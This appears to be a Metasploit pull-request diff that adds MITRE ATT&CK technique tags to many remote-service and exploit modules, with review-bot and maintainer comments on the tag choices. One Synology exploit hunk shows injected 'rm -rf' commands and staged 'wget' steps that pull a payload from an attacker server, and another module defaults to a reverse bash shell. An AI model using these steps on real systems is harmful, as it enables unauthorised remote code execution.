1 change: 1 addition & 0 deletions modules/auxiliary/admin/smb/change_password.rb
@@ -26,6 +26,7 @@ def initialize(info = {})
],
'References' => [
['URL', 'https://github.com/fortra/impacket/blob/master/examples/changepasswd.py'],
[ 'ATT&CK', Mitre::Attack::Technique::T1021_002_SMB_WINDOWS_ADMIN_SHARES ]
],
'Notes' => {
'Stability' => [CRASH_SAFE],
1 change: 1 addition & 0 deletions modules/auxiliary/admin/smb/check_dir_file.rb
@@ -31,6 +31,7 @@ def initialize
'j0hn__f'
],
'References' => [
[ 'ATT&CK', Mitre::Attack::Technique::T1021_002_SMB_WINDOWS_ADMIN_SHARES ]
],
'License' => MSF_LICENSE,
'Notes' => {
3 changes: 3 additions & 0 deletions modules/auxiliary/admin/smb/delete_file.rb
@@ -30,6 +30,9 @@ def initialize
'mubix' # copied from hdm upload_file module
],
'License' => MSF_LICENSE,
'References' => [
[ 'ATT&CK', Mitre::Attack::Technique::T1021_002_SMB_WINDOWS_ADMIN_SHARES ]
],
'Notes' => {
'Stability' => [OS_RESOURCE_LOSS],
'SideEffects' => [],
5 changes: 4 additions & 1 deletion modules/auxiliary/admin/smb/download_file.rb
@@ -29,7 +29,10 @@ def initialize
'Stability' => [CRASH_SAFE],
'SideEffects' => [],
'Reliability' => []
}
},
'References' => [
[ 'ATT&CK', Mitre::Attack::Technique::T1021_002_SMB_WINDOWS_ADMIN_SHARES ]
]
)

register_options([
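Review bot: `'References'` is appended after the `'Notes'` hash here, while the other SMB admin modules in this change (`change_password.rb`, `check_dir_file.rb`, `delete_file.rb`, `list_directory.rb`, `upload_file.rb`) keep `'References'` ahead of `'Notes'`. Moving the new key above `'Notes'` would keep the metadata layout uniform and make the ATT&CK tag easier to spot when these files are read side by side. The start of the info hash is outside this hunk, so the ordering of the earlier keys could not be checked.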
1 change: 1 addition & 0 deletions modules/auxiliary/admin/smb/list_directory.rb
@@ -27,6 +27,7 @@ def initialize
'hdm'
],
'References' => [
[ 'ATT&CK', Mitre::Attack::Technique::T1021_002_SMB_WINDOWS_ADMIN_SHARES ]
],
'License' => MSF_LICENSE,
'Notes' => {
1 change: 1 addition & 0 deletions modules/auxiliary/admin/smb/ms17_010_command.rb
@@ -41,6 +41,7 @@ def initialize(info = {})
[ 'URL', 'https://github.com/worawit/MS17-010' ],
[ 'URL', 'https://hitcon.org/2017/CMT/slide-files/d2_s2_r0.pdf' ],
[ 'URL', 'https://blogs.technet.microsoft.com/srd/2017/06/29/eternal-champion-exploit-analysis/' ],
[ 'ATT&CK', Mitre::Attack::Technique::T1021_002_SMB_WINDOWS_ADMIN_SHARES ],
],
'DisclosureDate' => '2017-03-14',
'Notes' => {
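Review bot: The added `'ATT&CK'` entry records only the SMB admin-share activity, while the neighbouring references (the MS17-010 repository and the EternalChampion analysis) describe exploitation of an SMB vulnerability. Anyone mapping modules to detections from this metadata would therefore miss the exploitation phase. Consider a second entry for T1210 (Exploitation of Remote Services) next to `T1021_002_SMB_WINDOWS_ADMIN_SHARES`, using whichever constant `Mitre::Attack::Technique` defines for it. The same gap appears to apply to `libssh_auth_bypass.rb` and `realvnc_41_bypass.rb`, whose references are authentication-bypass CVEs. The module body is outside this hunk, so this is inferred from the reference list alone.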
3 changes: 2 additions & 1 deletion modules/auxiliary/admin/smb/psexec_ntdsgrab.rb
@@ -35,7 +35,8 @@ def initialize(info = {})
'References' => [
[ 'URL', 'http://sourceforge.net/projects/smbexec' ],
[ 'URL', 'https://www.optiv.com/blog/owning-computers-without-shell-access' ],
[ 'ATT&CK', Mitre::Attack::Technique::T1003_003_NTDS ]
[ 'ATT&CK', Mitre::Attack::Technique::T1003_003_NTDS ],
[ 'ATT&CK', Mitre::Attack::Technique::T1021_002_SMB_WINDOWS_ADMIN_SHARES ]
],
'Notes' => {
'Stability' => [CRASH_SAFE],
3 changes: 2 additions & 1 deletion modules/auxiliary/admin/smb/samba_symlink_traversal.rb
@@ -29,7 +29,8 @@ def initialize
'References' => [
['CVE', '2010-0926'],
['OSVDB', '62145'],
['URL', 'http://www.samba.org/samba/news/symlink_attack.html']
['URL', 'http://www.samba.org/samba/news/symlink_attack.html'],
['ATT&CK', Mitre::Attack::Technique::T1021_002_SMB_WINDOWS_ADMIN_SHARES]
],
'License' => MSF_LICENSE,
'Notes' => {
1 change: 1 addition & 0 deletions modules/auxiliary/admin/smb/upload_file.rb
@@ -26,6 +26,7 @@ def initialize
'hdm' # metasploit module
],
'References' => [
[ 'ATT&CK', Mitre::Attack::Technique::T1021_002_SMB_WINDOWS_ADMIN_SHARES ]
],
'License' => MSF_LICENSE,
'Notes' => {
3 changes: 2 additions & 1 deletion modules/auxiliary/admin/smb/webexec_command.rb
@@ -30,7 +30,8 @@ def initialize(info = {})
'License' => MSF_LICENSE,
'References' => [
['URL', 'https://webexec.org'],
['CVE', '2018-15442']
['CVE', '2018-15442'],
['ATT&CK', Mitre::Attack::Technique::T1021_002_SMB_WINDOWS_ADMIN_SHARES]
],
'Notes' => {
'Stability' => [CRASH_SAFE],
1 change: 1 addition & 0 deletions modules/auxiliary/admin/vnc/realvnc_41_bypass.rb
@@ -29,6 +29,7 @@ def initialize(info = {})
['OSVDB', '25479'],
['URL', 'https://web.archive.org/web/20080102163013/http://secunia.com/advisories/20107/'],
['CVE', '2006-2369'],
['ATT&CK', Mitre::Attack::Technique::T1021_005_VNC],
],
'DisclosureDate' => '2006-05-15',
'Notes' => {
1 change: 1 addition & 0 deletions modules/auxiliary/scanner/smb/smb_login.rb
@@ -43,6 +43,7 @@ def initialize
],
'References' => [
[ 'CVE', '1999-0506'], # Weak password
[ 'ATT&CK', Mitre::Attack::Technique::T1021_002_SMB_WINDOWS_ADMIN_SHARES ],
],
'License' => MSF_LICENSE,
'DefaultOptions' => {
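Review bot: The existing reference in this list is annotated `# Weak password`, which points at credential guessing, yet the added entry records only the remote-service technique. For a login scanner the closer ATT&CK fit is T1110 (Brute Force), and a second `'ATT&CK'` entry for it would let defenders who consume this metadata match the module to their password-guessing detections. The same applies to `ssh_login.rb`, `telnet_login.rb`, `vnc_login.rb` and `winrm_login.rb`, which carry the same `# Weak password` reference in this change. The constant name for T1110 is not visible on this page and should be taken from `Mitre::Attack::Technique`.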
3 changes: 2 additions & 1 deletion modules/auxiliary/scanner/ssh/eaton_xpert_backdoor.rb
@@ -33,7 +33,8 @@ def initialize(info = {})
['CVE', '2018-16158'],
['EDB', '45283'],
['URL', 'https://www.eaton.com/content/dam/eaton/company/news-insights/cybersecurity/security-bulletins/PXM-Advisory.pdf'],
['URL', 'https://www.ctrlu.net/vuln/0006.html']
['URL', 'https://www.ctrlu.net/vuln/0006.html'],
['ATT&CK', Mitre::Attack::Technique::T1021_004_SSH]
],
'DisclosureDate' => '2018-07-18',
'License' => MSF_LICENSE,
3 changes: 2 additions & 1 deletion modules/auxiliary/scanner/ssh/fortinet_backdoor.rb
@@ -29,7 +29,8 @@ def initialize(info = {})
['EDB', '39224'],
['PACKETSTORM', '135225'],
['URL', 'https://seclists.org/fulldisclosure/2016/Jan/26'],
['URL', 'https://blog.fortinet.com/post/brief-statement-regarding-issues-found-with-fortios']
['URL', 'https://blog.fortinet.com/post/brief-statement-regarding-issues-found-with-fortios'],
['ATT&CK', Mitre::Attack::Technique::T1021_004_SSH]
],
'DisclosureDate' => '2016-01-09',
'License' => MSF_LICENSE,
3 changes: 2 additions & 1 deletion modules/auxiliary/scanner/ssh/juniper_backdoor.rb
@@ -26,7 +26,8 @@ def initialize(info = {})
'References' => [
['CVE', '2015-7755'],
['URL', 'https://www.rapid7.com/blog/post/2015/12/20/cve-2015-7755-juniper-screenos-authentication-backdoor/'],
['URL', 'https://kb.juniper.net/InfoCenter/index?page=content&id=JSA10713']
['URL', 'https://kb.juniper.net/InfoCenter/index?page=content&id=JSA10713'],
['ATT&CK', Mitre::Attack::Technique::T1021_004_SSH]
],
'DisclosureDate' => '2015-12-20',
'License' => MSF_LICENSE,
3 changes: 2 additions & 1 deletion modules/auxiliary/scanner/ssh/libssh_auth_bypass.rb
@@ -36,7 +36,8 @@ def initialize(info = {})
],
'References' => [
['CVE', '2018-10933'],
['URL', 'https://www.libssh.org/security/advisories/CVE-2018-10933.txt']
['URL', 'https://www.libssh.org/security/advisories/CVE-2018-10933.txt'],
['ATT&CK', Mitre::Attack::Technique::T1021_004_SSH]
],
'DisclosureDate' => '2018-10-16',
'License' => MSF_LICENSE,
5 changes: 4 additions & 1 deletion modules/auxiliary/scanner/ssh/ssh_enum_git_keys.rb
@@ -22,7 +22,10 @@ def initialize(info = {})
'Author' => ['Wyatt Dahlenburg (@wdahlenb)'],
'Platform' => ['linux'],
'SessionTypes' => ['shell', 'meterpreter'],
'References' => [['URL', 'https://docs.github.com/en/authentication/connecting-to-github-with-ssh/testing-your-ssh-connection']],
'References' => [
['URL', 'https://docs.github.com/en/authentication/connecting-to-github-with-ssh/testing-your-ssh-connection'],
['ATT&CK', Mitre::Attack::Technique::T1021_004_SSH]
],
'Notes' => {
'Reliability' => UNKNOWN_RELIABILITY,
'Stability' => UNKNOWN_STABILITY,
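Review bot: `'SessionTypes'` shows that this module runs over an existing session, and its only other reference is GitHub's page on testing an SSH connection, so it looks like it checks already-collected SSH keys rather than logging in to a target host over SSH. If that reading is right, T1552.004 (Unsecured Credentials: Private Keys) describes the behaviour better than `T1021_004_SSH`, or should at least be listed next to it. The module body is outside this hunk, so this needs confirming against the code before the tag is changed.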
3 changes: 2 additions & 1 deletion modules/auxiliary/scanner/ssh/ssh_login.rb
@@ -28,7 +28,8 @@ def initialize
},
'Author' => ['todb'],
'References' => [
[ 'CVE', '1999-0502'] # Weak password
[ 'CVE', '1999-0502'], # Weak password
[ 'ATT&CK', Mitre::Attack::Technique::T1021_004_SSH ]
],
'License' => MSF_LICENSE,
'DefaultOptions' => { 'VERBOSE' => false } # Disable annoying connect errors
5 changes: 4 additions & 1 deletion modules/auxiliary/scanner/ssh/ssh_login_pubkey.rb
@@ -35,7 +35,10 @@ def initialize
be shared between subject keys or only belong to a single one.
},
'Author' => ['todb', 'RageLtMan'],
'License' => MSF_LICENSE
'License' => MSF_LICENSE,
'References' => [
[ 'ATT&CK', Mitre::Attack::Technique::T1021_004_SSH ]
]
)

register_options(
3 changes: 2 additions & 1 deletion modules/auxiliary/scanner/telnet/telnet_login.rb
@@ -26,7 +26,8 @@ def initialize
},
'Author' => 'egypt',
'References' => [
[ 'CVE', '1999-0502'] # Weak password
[ 'CVE', '1999-0502'], # Weak password
[ 'ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES ]
],
'License' => MSF_LICENSE
)
3 changes: 2 additions & 1 deletion modules/auxiliary/scanner/telnet/telnet_ruggedcom.rb
@@ -21,7 +21,8 @@ def initialize(info = {})
'References' => [
[ 'CVE', '2012-1803' ],
[ 'EDB', '18779' ],
[ 'US-CERT-VU', '889195' ]
[ 'US-CERT-VU', '889195' ],
[ 'ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES ]
],
'Author' => [
'Borja Merino <bmerinofe[at]gmail.com>',
3 changes: 2 additions & 1 deletion modules/auxiliary/scanner/vnc/ard_root_pw.rb
@@ -14,7 +14,8 @@ def initialize
'Description' => 'Enable and set root account to a chosen password on unpatched macOS High Sierra hosts with either Screen Sharing or Remote Management enabled.',
'References' => [
['CVE', '2017-13872'],
['URL', 'https://support.apple.com/en-us/HT208315']
['URL', 'https://support.apple.com/en-us/HT208315'],
['ATT&CK', Mitre::Attack::Technique::T1021_005_VNC]
],
'Author' => 'jgor',
'License' => MSF_LICENSE
3 changes: 2 additions & 1 deletion modules/auxiliary/scanner/vnc/vnc_login.rb
@@ -26,7 +26,8 @@ def initialize
'jduck'
],
'References' => [
[ 'CVE', '1999-0506'] # Weak password
[ 'CVE', '1999-0506'], # Weak password
[ 'ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES ]
],
'License' => MSF_LICENSE
)
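Review bot: This module is tagged with the parent technique `T1021_REMOTE_SERVICES`, while the other two VNC modules in this change (`realvnc_41_bypass.rb` and `ard_root_pw.rb`) use the sub-technique `T1021_005_VNC`. Unless the parent is deliberate, the entry should read `[ 'ATT&CK', Mitre::Attack::Technique::T1021_005_VNC ]` so that a filter on the VNC sub-technique finds all three modules.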
5 changes: 4 additions & 1 deletion modules/auxiliary/scanner/winrm/winrm_cmd.rb
@@ -17,7 +17,10 @@ def initialize
This module runs arbitrary Windows commands using the WinRM Service
},
'Author' => [ 'thelightcosine' ],
'License' => MSF_LICENSE
'License' => MSF_LICENSE,
'References' => [
[ 'ATT&CK', Mitre::Attack::Technique::T1021_006_WINDOWS_REMOTE_MANAGEMENT ]
]
)

register_options(
3 changes: 2 additions & 1 deletion modules/auxiliary/scanner/winrm/winrm_login.rb
@@ -30,7 +30,8 @@ module without SSL, the 'AllowUnencrypted' winrm option must be set.
},
'Author' => [ 'thelightcosine', 'smashery' ],
'References' => [
[ 'CVE', '1999-0502'] # Weak password
[ 'CVE', '1999-0502'], # Weak password
[ 'ATT&CK', Mitre::Attack::Technique::T1021_006_WINDOWS_REMOTE_MANAGEMENT ]
],
'License' => MSF_LICENSE
)
5 changes: 4 additions & 1 deletion modules/auxiliary/scanner/winrm/winrm_wql.rb
@@ -19,7 +19,10 @@ def initialize
winrm option must be set.
},
'Author' => [ 'thelightcosine' ],
'License' => MSF_LICENSE
'License' => MSF_LICENSE,
'References' => [
[ 'ATT&CK', Mitre::Attack::Technique::T1021_006_WINDOWS_REMOTE_MANAGEMENT ]
]
)

register_options(
3 changes: 2 additions & 1 deletion modules/exploits/apple_ios/ssh/cydia_default_ssh.rb
@@ -26,7 +26,8 @@ def initialize(info = {})
'hdm'
],
'References' => [
['OSVDB', '61284']
['OSVDB', '61284'],
['ATT&CK', Mitre::Attack::Technique::T1021_004_SSH]
],
'DefaultOptions' => {
'EXITFUNC' => 'thread'
Original file line number Diff line number Diff line change
@@ -42,7 +42,8 @@ def initialize(info = {})
'References' => [
['CVE', '2023-45249'],
['URL', 'https://security-advisory.acronis.com/advisories/SEC-6452'],
['URL', 'https://attackerkb.com/topics/T2b62daDsL/cve-2023-45249']
['URL', 'https://attackerkb.com/topics/T2b62daDsL/cve-2023-45249'],
['ATT&CK', Mitre::Attack::Technique::T1021_004_SSH]
],
'License' => MSF_LICENSE,
'Platform' => ['unix', 'linux'],
3 changes: 2 additions & 1 deletion modules/exploits/linux/http/asuswrt_lan_rce.rb
@@ -33,7 +33,8 @@ def initialize(info = {})
['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/asuswrt-lan-rce.txt'],
['URL', 'https://seclists.org/fulldisclosure/2018/Jan/78'],
['CVE', '2018-5999'],
['CVE', '2018-6000']
['CVE', '2018-6000'],
['ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES]
Contributor

This module does not use an account; it uses a special POST request to place the router in command mode, then sends a UDP packet instructing the router to start a telnet server serving bash.

Contributor Author

That's a valid point, and it brings up a good question about our classification methodology. Given that the module's ultimate goal is to establish a Telnet service for RCE, should we classify it as a 'Remote Service' attack based on the outcome and workflow, rather than solely on the initial point of entry?

],
'Targets' => [
[
3 changes: 2 additions & 1 deletion modules/exploits/linux/http/beyondtrust_pra_rs_unauth_rce.rb
@@ -29,7 +29,8 @@ def initialize(info = {})
['CVE', '2025-1094'], # The SQL injection in PostgreSQL code.
['URL', 'http://web.archive.org/web/20241226144006/https://www.beyondtrust.com/trust-center/security-advisories/bt24-10'], # BeyondTrust Advisory
['URL', 'https://www.postgresql.org/support/security/CVE-2025-1094/'], # PostgreSQL Advisory
['URL', 'https://attackerkb.com/topics/G5s8ZWAbYH/cve-2024-12356/rapid7-analysis'] # Rapid7 Analysis
['URL', 'https://attackerkb.com/topics/G5s8ZWAbYH/cve-2024-12356/rapid7-analysis'], # Rapid7 Analysis
['ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES]
Contributor

I do not see anywhere in this module where we are using an authenticated account?

Contributor Author

Should we restrict the Remote Service attack to services with authenticated accounts?

It looks like this module exploits an unauthenticated remote code execution vulnerability in a remote service (BeyondTrust PRA/RS) using a WebSocket connection. I'm inclined to say it aligns with T1021, as it exploits a vulnerability in a remote support service to gain remote code execution.

],
'DisclosureDate' => '2024-12-16',
'Platform' => [ 'linux', 'unix' ],
3 changes: 2 additions & 1 deletion modules/exploits/linux/http/f5_icontrol_exec.rb
@@ -24,7 +24,8 @@ def initialize(info = {})
],
'References' => [
['CVE', '2014-2928'],
['URL', 'http://support.f5.com/kb/en-us/solutions/public/15000/200/sol15220.html']
['URL', 'http://support.f5.com/kb/en-us/solutions/public/15000/200/sol15220.html'],
['ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES]
],
'Platform' => ['unix'],
'Arch' => ARCH_CMD,
Original file line number Diff line number Diff line change
@@ -53,7 +53,8 @@ module does not presently support exploiting these targets.
],
'References' => [
['CVE', '2019-15949'],
['URL', 'https://github.com/jakgibb/nagiosxi-root-rce-exploit'] # original PHP exploit
['URL', 'https://github.com/jakgibb/nagiosxi-root-rce-exploit'], # original PHP exploit
['ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES]
],
'Payload' => { 'BadChars' => "\x00" },
'Targets' => [
@@ -77,7 +78,9 @@ module does not presently support exploiting these targets.
'Platform' => 'unix',
'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' },
'Payload' => {
# rubocop:disable Lint/DetectMetadataTrailingLeadingWhitespace
'Append' => ' & disown', # the payload must be disowned after execution, otherwise cleanup fails
# rubocop:enable Lint/DetectMetadataTrailingLeadingWhitespace
'BadChars' => '"'
}
}
3 changes: 2 additions & 1 deletion modules/exploits/linux/http/supervisor_xmlrpc_exec.rb
@@ -29,7 +29,8 @@ def initialize(info = {})
['URL', 'https://github.com/Supervisor/supervisor/issues/964'],
['URL', 'https://www.debian.org/security/2017/dsa-3942'],
['URL', 'https://github.com/phith0n/vulhub/tree/master/supervisor/CVE-2017-11610'],
['CVE', '2017-11610']
['CVE', '2017-11610'],
['ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES]
],
'Platform' => 'linux',
'Targets' => [
11 changes: 6 additions & 5 deletions modules/exploits/linux/http/synology_dsm_smart_exec_auth.rb
@@ -39,7 +39,8 @@ def initialize(info = {})
[ 'CVE', '2017-15889' ],
[ 'EDB', '43190' ],
[ 'URL', 'https://ssd-disclosure.com/ssd-advisory-synology-storagemanager-smart-cgi-remote-command-execution/' ],
[ 'URL', 'https://synology.com/en-global/security/advisory/Synology_SA_17_65_DSM' ]
[ 'URL', 'https://synology.com/en-global/security/advisory/Synology_SA_17_65_DSM' ],
[ 'ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES ]
],
'Privileged' => true,
'Stance' => Msf::Exploit::Stance::Aggressive,
@@ -179,20 +180,20 @@ def exploit
})

print_status('Cleaning env')
inject_request(cookie, token, cmd = 'rm -rf /a')
inject_request(cookie, token, cmd = 'rm -rf b')
inject_request(cookie, token, 'rm -rf /a')
inject_request(cookie, token, 'rm -rf b')
Comment on lines +183 to +184
Contributor Author

Rubocop was not happy with this...

command = "#{datastore['SRVHOST']}:#{datastore['SRVPORT']}".split(//)
command_space = 22 - "echo -n ''>>/a".length
command_space -= 1
command.each_slice(command_space) do |a|
a = a.join('')
vprint_status("Staging wget with: echo -n '#{a}'>>/a")
inject_request(cookie, token, cmd = "echo -n '#{a}'>>/a")
inject_request(cookie, token, "echo -n '#{a}'>>/a")
end
print_status('Requesting payload pull')
register_file_for_cleanup('/usr/syno/synoman/webman/modules/StorageManager/b')
register_file_for_cleanup('/a')
inject_request(cookie, token, cmd = 'wget -i /a -O b')
inject_request(cookie, token, 'wget -i /a -O b')
# at this point we let the HTTP server call the last stage
# wfsdelay should be long enough to hold out for everything to download and run
rescue ::Rex::ConnectionError
Original file line number Diff line number Diff line change
@@ -36,7 +36,8 @@ def initialize(info = {})
},
'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },
'References' => [
[ 'CVE', '2013-2578']
[ 'CVE', '2013-2578'],
[ 'ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES ]
],
'Targets' => [
[ 'Automatic', {} ],
3 changes: 2 additions & 1 deletion modules/exploits/linux/http/wazuh_auth_rce_cve_2025_24016.rb
@@ -31,7 +31,8 @@ def initialize(info = {})
'References' => [
['CVE', '2025-24016'],
['URL', 'https://github.com/wazuh/wazuh/security/advisories/GHSA-hcrc-79hj-m3qh'],
['URL', 'https://attackerkb.com/topics/piW0q4r5Uy/cve-2025-24016']
['URL', 'https://attackerkb.com/topics/piW0q4r5Uy/cve-2025-24016'],
['ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES]
],
'License' => MSF_LICENSE,
'Platform' => ['unix', 'linux'],